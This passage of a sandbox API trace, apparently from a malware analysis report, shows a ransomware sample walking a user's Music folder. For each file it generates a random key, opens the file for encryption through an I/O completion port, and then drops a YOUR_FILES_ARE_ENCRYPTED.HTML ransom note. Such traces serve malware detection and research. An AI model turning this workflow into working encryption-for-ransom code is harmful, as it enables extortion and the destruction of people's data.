wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="99") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BA") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="BE") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="83") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="47") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="95") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="11") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="89") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="89") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="09") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="BD") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="90") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="9A") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="EF") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A2") returned 2 [0167.674] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="47") returned 2 [0167.674] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3" [0167.674] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.674] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, 
dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0167.674] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b471c60, ftCreationTime.dwHighDateTime=0x1d7e3bb, ftLastAccessTime.dwLowDateTime=0x230869c0, ftLastAccessTime.dwHighDateTime=0x1d7e613, ftLastWriteTime.dwLowDateTime=0x230869c0, ftLastWriteTime.dwHighDateTime=0x1d7e613, nFileSizeHigh=0x0, nFileSizeLow=0x11a71, dwReserved0=0x0, dwReserved1=0x60, cFileName="HgGnGttNLJOcZZ62.m4a", cAlternateFileName="HGGNGT~1.M4A")) returned 1 [0167.674] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a") returned 62 [0167.674] lstrcmpW (lpString1="HgGnGttNLJOcZZ62.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.674] PathFindExtensionW (pszPath="HgGnGttNLJOcZZ62.m4a") returned=".m4a" [0167.674] lstrlenW (lpString=".m4a") returned 4 [0167.674] PathFindExtensionW (pszPath="HgGnGttNLJOcZZ62.m4a") returned=".m4a" [0167.674] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\hggngttnljoczz62.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0167.675] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=72305) returned 1 [0167.675] GetProcessHeap () returned 0x270000 [0167.675] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76081a0 [0167.677] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="EA") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: 
param_1="93") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="EA") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="9A") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="23") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="92") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="EF") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="14") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="18") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="FC") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="72") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="34") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="6C") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E1") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1D") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="DC") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="28") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="CA") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FD") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="46") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F0") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="8B") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0167.678] wsprintfW (in: 
param_1=0x4ebda92, param_2="%02X" | out: param_1="D1") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0F") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="6A") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="DB") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B2") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D3") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="7A") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E2") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6D") returned 2 [0167.678] lstrcpyW (in: lpString1=0x7618254, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a" [0167.678] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x76081a0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.678] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76081a0, lpOverlapped=0x76081a0) returned 1 [0167.678] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff99a0, ftCreationTime.dwHighDateTime=0x1d7da0d, ftLastAccessTime.dwLowDateTime=0xad6546a0, ftLastAccessTime.dwHighDateTime=0x1d7e222, ftLastWriteTime.dwLowDateTime=0xad6546a0, ftLastWriteTime.dwHighDateTime=0x1d7e222, nFileSizeHigh=0x0, nFileSizeLow=0x862b, dwReserved0=0x0, dwReserved1=0x60, cFileName="HIZ9LvZ4anxkVZvGFJ.mp3", cAlternateFileName="HIZ9LV~1.MP3")) returned 1 [0167.679] wnsprintfW (in: pszDest=0x74c2008, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3") returned 64 [0167.679] lstrcmpW (lpString1="HIZ9LvZ4anxkVZvGFJ.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.679] PathFindExtensionW (pszPath="HIZ9LvZ4anxkVZvGFJ.mp3") returned=".mp3" [0167.679] lstrlenW (lpString=".mp3") returned 4 [0167.679] PathFindExtensionW (pszPath="HIZ9LvZ4anxkVZvGFJ.mp3") returned=".mp3" [0167.679] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\hiz9lvz4anxkvzvgfj.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.679] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=34347) returned 1 [0167.679] GetProcessHeap () returned 0x270000 [0167.679] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0167.684] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DF") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="27") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="03") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="14") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="37") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="4D") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="BF") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3B") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: 
param_1="8E") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="89") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="24") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="DD") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="94") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FC") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="5F") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="80") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="67") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="46") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="6B") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="6E") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="0B") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5E") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="CD") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="D5") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="CC") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="48") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="D7") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="5F") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="24") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E5") returned 2 [0167.685] wsprintfW (in: 
param_1=0x4ebdaae, param_2="%02X" | out: param_1="0C") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="18") returned 2 [0167.686] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3" [0167.686] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.686] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0167.686] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1664e6d0, ftCreationTime.dwHighDateTime=0x1d7e2ad, ftLastAccessTime.dwLowDateTime=0x8129db80, ftLastAccessTime.dwHighDateTime=0x1d7e328, ftLastWriteTime.dwLowDateTime=0x8129db80, ftLastWriteTime.dwHighDateTime=0x1d7e328, nFileSizeHigh=0x0, nFileSizeLow=0x1481d, dwReserved0=0x0, dwReserved1=0x60, cFileName="nFrHcwd2OR.m4a", cAlternateFileName="NFRHCW~1.M4A")) returned 1 [0167.686] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a") returned 56 [0167.686] lstrcmpW (lpString1="nFrHcwd2OR.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.686] PathFindExtensionW (pszPath="nFrHcwd2OR.m4a") returned=".m4a" [0167.686] lstrlenW (lpString=".m4a") returned 4 [0167.686] PathFindExtensionW (pszPath="nFrHcwd2OR.m4a") returned=".m4a" [0167.686] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV 
sb2I\\nFrHcwd2OR.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\nfrhcwd2or.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.686] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=83997) returned 1 [0167.687] GetProcessHeap () returned 0x270000 [0167.687] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0167.688] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="04") returned 2 [0167.688] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3D") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="DC") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DF") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="B1") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="24") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="97") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3C") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="27") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5B") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="67") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="E9") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="4C") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9E") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="51") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C4") returned 2 [0167.689] 
wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="1E") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="1E") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FB") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="97") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B4") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4A") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="45") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="12") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BE") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="4D") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="87") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="84") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="3B") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D7") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="96") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="03") returned 2 [0167.690] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a" [0167.690] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.690] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, 
dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0167.692] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9a12320, ftCreationTime.dwHighDateTime=0x1d7d7a9, ftLastAccessTime.dwLowDateTime=0x99d91910, ftLastAccessTime.dwHighDateTime=0x1d7e621, ftLastWriteTime.dwLowDateTime=0x99d91910, ftLastWriteTime.dwHighDateTime=0x1d7e621, nFileSizeHigh=0x0, nFileSizeLow=0xcd7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="rmukOi2tRyk.wav", cAlternateFileName="RMUKOI~1.WAV")) returned 1 [0167.692] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav") returned 57 [0167.692] lstrcmpW (lpString1="rmukOi2tRyk.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.692] PathFindExtensionW (pszPath="rmukOi2tRyk.wav") returned=".wav" [0167.692] lstrlenW (lpString=".wav") returned 4 [0167.692] PathFindExtensionW (pszPath="rmukOi2tRyk.wav") returned=".wav" [0167.692] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\rmukoi2tryk.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.699] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=52604) returned 1 [0167.699] GetProcessHeap () returned 0x270000 [0167.699] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0167.700] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="84") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="41") returned 2 [0167.700] wsprintfW 
(in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="42") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="69") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8A") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EC") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9C") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BE") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="2D") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="67") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AF") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1F") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="79") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="35") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="28") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="A2") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="60") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="1E") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F1") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="2E") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="42") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="14") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="FF") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C7") 
returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C9") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DF") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6D") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E2") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="96") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B7") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="72") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="26") returned 2 [0167.702] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav" [0167.702] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.702] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0167.711] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9a12320, ftCreationTime.dwHighDateTime=0x1d7d7a9, ftLastAccessTime.dwLowDateTime=0x99d91910, ftLastAccessTime.dwHighDateTime=0x1d7e621, ftLastWriteTime.dwLowDateTime=0x99d91910, ftLastWriteTime.dwHighDateTime=0x1d7e621, nFileSizeHigh=0x0, nFileSizeLow=0xcd7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="rmukOi2tRyk.wav", cAlternateFileName="RMUKOI~1.WAV")) returned 0 [0167.715] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.715] wnsprintfW (in: 
pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0167.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.716] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.718] CloseHandle (hObject=0x5ac) returned 1 [0167.718] GetProcessHeap () returned 0x270000 [0167.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.719] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b47e1b0, ftCreationTime.dwHighDateTime=0x1d7e1a9, ftLastAccessTime.dwLowDateTime=0x91ebe20, ftLastAccessTime.dwHighDateTime=0x1d7e590, ftLastWriteTime.dwLowDateTime=0x91ebe20, ftLastWriteTime.dwHighDateTime=0x1d7e590, nFileSizeHigh=0x0, 